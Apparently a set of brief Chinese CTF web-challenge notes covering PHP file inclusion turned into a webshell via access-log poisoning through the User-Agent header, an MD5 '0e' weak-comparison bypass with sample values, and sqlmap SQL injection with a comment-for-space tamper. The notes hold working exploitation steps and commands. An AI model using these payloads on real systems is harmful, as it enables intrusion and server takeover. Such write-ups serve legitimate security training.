web4
<?php include($_GET['url']);?>
url=/var/log/nginx/access.log 用 burp抓包 修改user-agent头,写入一句话马儿,一剑链接
---------------------------------------------------------------------------------------------------------------------------
web5
<?php
$flag="";
$v1=$_GET['v1'];
$v2=$_GET['v2'];
if(isset($v1) && isset($v2)){
if(!ctype_alpha($v1)){
die("v1 error");
}
if(!is_numeric($v2)){
die("v2 error");
}
if(md5($v1)==md5($v2)){
echo $flag;
}
}else{
echo "where is flag?";
}
?>
md5绕过
md5弱类型比较,这时候传入两个加密后开头为0e的不相等值就可以绕过了。
QNKCDZO
0e830400451993494058024219903391
240610708
0e462097431906509019562988736854
----------------------------------------------------------------------------------------------------------------
web6
sql "url" --tamper="space2comment" -dbs
---------------------------------------------------------------------------------------------------------------
web7
index.php?id=1 注入点 空格/**/绕过
sql "url" --tamper="space2comment" -dbs
----------------------------------------------------------------------------------------
web8